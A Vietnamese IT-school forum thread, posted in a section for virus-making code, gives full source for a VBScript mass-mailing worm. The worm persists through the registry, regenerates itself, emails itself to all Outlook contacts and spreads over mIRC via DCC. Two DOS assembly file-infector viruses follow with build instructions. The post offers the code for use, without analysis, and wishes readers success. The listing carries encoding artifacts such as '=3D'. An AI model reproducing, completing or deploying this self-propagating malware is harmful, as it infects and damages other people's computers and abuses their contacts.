»-(¯`v´¯)-»Diễn Đàn Trường Công Nghệ Thông Tin Thái Nguyên»-(¯`v´¯)-»

.:hix lâu không làm web.nên giờ lười làm quá.dùng tạm cái Forum việt vậy.chủ yếu là chất lượng Những bài viết thôi đúng không.thật THà là nói hết không giấu diếm nhưng học xong cấm nghịch bậy..http://guichonguoiay.net.tf web mình đó RỖI VÀO CHơi Ha.hjhj:.
 
Trang ChínhPortalCalendarGalleryTrợ giúpTìm kiếmThành viênNhómĐăng kýĐăng Nhập
Thông Tin Cực Sock Cho Những Ai Nghiện Game Audition Của Thái Nguyên.Sau Một Thời Gian Tìm Hiểu Mà Nhờ Mấy Anh Ở forum ClbGame Mình Đã Cài THành Công Bản Audition Offline THái Nguyên.Sắp Tới Mình Sẽ Đưa Lên Online.Các Bạn Muốn Chơi Game Và Muốn Sở Hữu Những Bộ Đồ Đẹp Nhất Không Còn Chần Chừ Gì Nữa Mà Không Click Chuột Để Truy Cập Trang Web wWw.AuTn.tk Để Download Và Thưởng thức

Share | 
 

 MÃ NGUỒN CỦA VIRUS HOME PAGE

Go down 
Tác giảThông điệp
Admin
Admin


Tổng số bài gửi : 136
Join date : 13/03/2010

Bài gửiTiêu đề: MÃ NGUỒN CỦA VIRUS HOME PAGE   Tue Mar 16, 2010 4:35 pm

MÃ NGUỒN CỦA VIRUS HOME PAGE

'Homepage Created By Robinhood
Set FSO =3D createobject("scripting.filesystemobject")
dirsystem =3D FSO.getspecialfolder(1)
Path=3D dirsystem & "\Win32.dll.vbs"
Set WSH createobject("wscript.shell")
WSH.regwrite
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ru n\Win32dll",
"wscript.exe " & Path& " %"
FSO.copyfile wscript.scriptfullname, Path
payload=20
If =
WSH.regread("HKLM\SOFTWARE\Microsoft\Windows\Curre ntVersion\Homepage\Send
mail") <> 1 then
sendmail
End if
If
WSH.regread("HKLM\SOFTWARE\Microsoft\Windows\Curre ntVersion\Homepage\IRC"
) <> 1 then
IRC ""
End if
Set sourcefile=3D FSO.opentextfile(wscript.scriptfullname)
sourcetext sourcefile.readall
sourcefile.close
Do
if not(FSO.fileexists(wscript.scriptfullname)) then
set filebackup=3D FSO.createtextfile(wscript.scriptfullname)
filebackup.write sourcetext
filebackup.close
end if
sWSH.regread("HKLM\SOFTWARE\Microsoft\Windows\Curr entVersion\Run\Win32dll"
)
If s<> "wscript.exe " & Path& " %" then
WSH.regwrite =
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ru n\Win32dll", "wscript.exe " & Path& " %"
end if
s=3D ""
loop=20

Function sendmail()
Set myapp =3D CreateObject("Outlook.Application")
If myapp =3D "Outlook" Then
Set myname =3D myapp.GetNameSpace("MAPI")
Set myaddlists =3D myname.AddressLists
For Each myaddlist In myaddlists
If myaddlist.AddressEntries.Count <> 0 Then
x =3D myaddlist.AddressEntries.Count
For i =3D 1 To x
Set mailitem =3D myapp.CreateItem(0)
Set myadd =3D myaddlist.AddressEntries(i)
mailitem.To =3D myadd.Address
mailitem.Subject =3D "Very Important!"
mailitem.Body =3D "Hi:" & vbcrlf & "Please view this file, it's very
important." & vbcrlf & ""
execute "set myatts =3Dmailitem." & Chr(65) & Chr(116) & Chr(116) &
Chr(97) & Chr(99) & Chr(104) & Chr(109) & Chr(101) & Chr(110) & Chr(116)
& Chr(115)
copypath Path
mailitem.DeleteAfterSubmit True
myatts.Add copypath
If mailitem.To <> "" Then
mailitem.Send
End If
Next
End If
Next
End If
End function
Function IRC(ircpath)
If ircpath <> "" Then
programpath
WSH.regread("HKEY_LOCAL_MACHINE\Software\Microsoft \Windows\CurrentVersion
\ProgramFilesDir")
If FSO.fileexists("c:\mirc\mirc.ini") Then
ircpath =3D "c:\mirc"
ElseIf FSO.fileexists("c:\mirc32\mirc.ini") Then
ircpath =3D "c:\mirc32"
ElseIf FSO.fileexists(programpath & "\mirc\mirc.ini") Then
ircpath =3D programpath & "\mirc"
ElseIf FSO.fileexists(programpath & "\mirc32\mirc.ini") Then
ircpath =3D programpath & "\mirc"
Else
ircpath =3D ""
End If
End If
If ircpath <> "" Then
Set ircscript =3D FSO.CreateTextFile(ircpath & "\script.ini", True)
text =3D "[script]" & vbCrLf & "n0=3Don 1:JOIN:#:{"
text =3D text & vbCrLf & "n0=3Don 1:JOIN:#:{"
text =3D text & vbCrLf & "n1=3D /if ( $nick =3D=3D $me ) { halt }"
text =3D text & vbCrLf & "n2=3D /." & Chr(100) & Chr(99) & Chr(99) & "
send $nick "
text =3D text & Path
text =3D text & vbCrLf & "n3=3D}"
ircscript.write(text)
ircscript.Close
End If
End Function=20

Function payload()
Randomize
If 1 + Int(Rnd * 5) =3D 7 then
WSH.run "Http://www.virii.com.ar",false
end if
end function

Code:

; virus from ALT-11 mag



; ---------------------------------------

;

; Coded by: Azagoth

; ---------------------------------------

; Assemble using Turbo Assembler:

; tasm /m2 <filename>.asm

; tlink /t <filename>.obj

; ---------------------------------------------------------------------------

; - Non-Overwriting .COM infector (excluding COMMAND.COM)

; - COM growth: XXX bytes

; - It searches the current directory for uninfected files. If none are

; found, it searches previous directory until it reaches root and no more

; uninfected files are found. (One infection per run)

; - Also infects read-only files

; - Restores attributes, initial date/time-stamps, and original path.

; ---------------------------------------------------------------------------



.model tiny

.code



org 100h ; adjust for psp



start:



call get_disp ; push ip onto stack

get_disp:

pop bp ; bp holds current ip

sub bp, offset get_disp ; bp = code displacement



; original label offset is stored in machine code

; so new (ip) - original = displacement of code



save_path:

mov ah, 47h ; save cwd

xor dl, dl ; 0 = default drive

lea si, [bp + org_path]

int 21h



get_dta:

mov ah, 2fh

int 21h



mov [bp + old_dta_off], bx ; save old dta offset



set_dta: ; point to dta record

mov ah, 1ah

lea dx, [bp + dta_filler]

int 21h



search:

mov ah, 4eh ; find first file

mov cx, [bp + search_attrib] ; if successful dta is

lea dx, [bp + search_mask] ; created

int 21h

jnc clear_attrib ; if found, continue



find_next:

mov ah, 4fh ; find next file

int 21h

jnc clear_attrib



still_searching:

mov ah, 3bh

lea dx, [bp + previous_dir] ; cd ..

int 21h

jnc search

jmp bomb ; at root, no more files



clear_attrib:

mov ax, 4301h

xor cx, cx ; get rid of attributes

lea dx, [bp + dta_file_name]

int 21h



open_file:

mov ax, 3D02h ; AL=2 read/write

lea dx, [bp + dta_file_name]

int 21h



xchg bx, ax ; save file handle

; bx won't change from now on

check_if_command_com:

cld

lea di, [bp + com_com]

lea si, [bp + dta_file_name]

mov cx, 11 ; length of 'COMMAND.COM'

repe cmpsb ; repeat while equal

jne check_if_infected

jmp close_file



check_if_infected:

mov dx, word ptr [bp + dta_file_size] ; only use first word since

; COM file

sub dx, 2 ; file size - 2



mov ax, 4200h

mov cx, 0 ; cx:dx ptr to offset from

int 21h ; origin of move



mov ah, 3fh ; read last 2 characters

mov cx, 2

lea dx, [bp + last_chars]

int 21h



mov ah, [bp + last_chars]

cmp ah, [bp + virus_id]

jne save_3_bytes

mov ah, [bp + last_chars + 1]

cmp ah, [bp + virus_id + 1]

jne save_3_bytes

jmp close_file



save_3_bytes:

mov ax, 4200h ; 00=start of file

xor cx, cx

xor dx, dx

int 21h



mov ah, 3Fh

mov cx, 3

lea dx, [bp + _3_bytes]

int 21h



goto_eof:

mov ax, 4202h ; 02=End of file

xor cx, cx ; offset from origin of move

xor dx, dx ; (i.e. nowhere)

int 21h ; ax holds file size



; since it is a COM file, overflow will not occur



save_jmp_displacement:

sub ax, 3 ; file size - 3 = jmp disp.

mov [bp + jmp_disp], ax



write_code:

mov ah, 40h

mov cx, virus_length ;*** equate

lea dx, [bp + start]

int 21h



goto_bof:

mov ax, 4200h

xor cx, cx

xor dx, dx

int 21h



write_jmp: ; to file

mov ah, 40h

mov cx, 3

lea dx, [bp + jmp_code]

int 21h



inc [bp + infections]



restore_date_time:

mov ax, 5701h

mov cx, [bp + dta_file_time]

mov dx, [bp + dta_file_date]

int 21h



close_file:

mov ah, 3eh

int 21h



restore_attrib:

xor ch, ch

mov cl, [bp + dta_file_attrib] ; restore original attributes

mov ax, 4301h

lea dx, [bp + dta_file_name]

int 21h



done_infecting?:

mov ah, [bp + infections]

cmp ah, [bp + max_infections]

jz bomb

jmp find_next





bomb:



; cmp bp, 0

; je restore_path ; original run

;

;---- Stuff deleted



restore_path:

mov ah, 3bh ; when path stored

lea dx, [bp + root] ; '\' not included

int 21h



mov ah, 3bh ; cd to original path

lea dx, [bp + org_path]

int 21h



restore_dta:

mov ah, 1ah

mov dx, [bp + old_dta_off]

int 21h



restore_3_bytes: ; in memory

lea si, [bp + _3_bytes]

mov di, 100h

cld ; auto-inc si, di

mov cx, 3

rep movsb



return_control_or_exit?:

cmp bp, 0 ; bp = 0 if original run

je exit

mov di, 100h ; return control back to prog

jmp di ; -> cs:100h



exit:

mov ax, 4c00h

int 21h



;-------- Variable Declarations --------



old_dta_off dw 0 ; offset of old dta address



;-------- dta record

dta_filler db 21 dup (0)

dta_file_attrib db 0

dta_file_time dw 0

dta_file_date dw 0

dta_file_size dd 0

dta_file_name db 13 dup (0)

;--------

search_mask db '*.COM',0 ; files to infect: *.COM

search_attrib dw 00100111b ; all files a,s,h,r

com_com db 'COMMAND.COM'



previous_dir db '..',0

root db '\',0

org_path db 64 dup (0) ; original path



infections db 0 ; counter

max_infections db 1



_3_bytes db 0, 0, 0

jmp_code db 0E9h

jmp_disp dw 0



last_chars db 0, 0 ; do last chars = ID ?



virus_id db 'AZ'



eov: ; end of virus



virus_length equ offset eov - offset start



end start



Code:

VSize=085h



Code Segment

Assume CS:Code

org 0

db 4Dh

jmp Start



Org 600h



Bytes db 0CDh,20h,90h,90h



Start: mov si, 0100h

mov bx, offset Int21

mov cx, 0050h

mov di, si

add si, [si+2]

push di

movsw

movsw

mov es, cx

cmpsb

je StartFile

dec si

dec di

rep movsw

mov es, cx

xchg ax, bx

xchg ax, cx

Loop0: xchg ax, cx

xchg ax, word ptr es:[di-120h]

stosw

jcxz Loop0

xchg ax, bx

StartFile:

push ds

pop es

ret



Int21: cmp ax, 4B00h

jne End21

Exec: push ax

push bx

push dx

push ds

push es

mov ax, 3D02h

call DoInt21

jc EndExec

cbw ;Zero AH

cwd ;Zero DX

mov bx, si ;Move handle to BX

mov ds, ax ;Set DS and ES to 60h,

mov es, ax ;the virus data segment

mov ah, 3Fh ;Read first 4 bytes

int 69h

mov al, 4Dh

scasb ;Check for 4D5Ah or infected file mark

je Close ;.EXE or already infected

mov al, 2

call LSeek ;Seek to the end, SI now contains file size

mov cl, VSize ;Virus size in CX, prepare to write

int 69h ;AH is 40h, i.e. Write operation

mov ax, 0E94Dh ;Virus header in AX

stosw ;Store it

xchg ax, si ;Move file size in AX

stosw ;Complete JMP instruction

xchg ax, dx ;Zero AX

call LSeek ;Seek to the beginning

int 69h ;AH is 40h, write the virus header

Close: mov ah,3Eh ;Close the file

int 69h

EndExec: pop es

pop ds

pop dx

pop bx

pop ax

End21: jmp dword ptr cs:[69h * 4]



LSeek: mov ah, 42h ;Seek operation

cwd ;Zero DX

DoInt21: xor cx, cx ;External entry for Open, zero cx

int 69h

mov cl, 4 ;4 bytes will be read/written

xchg ax, si ;Store AX in SI

mov ax, 4060h ;Prepare AH for Write

xor di, di ;Zero DI

ret



VLen = $ - offset Bytes



Code EndS

End


; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ

; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ



Chúc các bạn thành công

Backdoor(VNISS)
Về Đầu Trang Go down
Xem lý lịch thành viên http://itcu.forumvi.com
 
MÃ NGUỒN CỦA VIRUS HOME PAGE
Về Đầu Trang 
Trang 1 trong tổng số 1 trang

Permissions in this forum:Bạn không có quyền trả lời bài viết
»-(¯`v´¯)-»Diễn Đàn Trường Công Nghệ Thông Tin Thái Nguyên»-(¯`v´¯)-» :: Phận Làm Trai Gõ Phím Bình Thiên Hạ--Chí Anh Hùng Click Chuột Định Giang Sơn :: Những Đoạn Mã Làm Virut-
Chuyển đến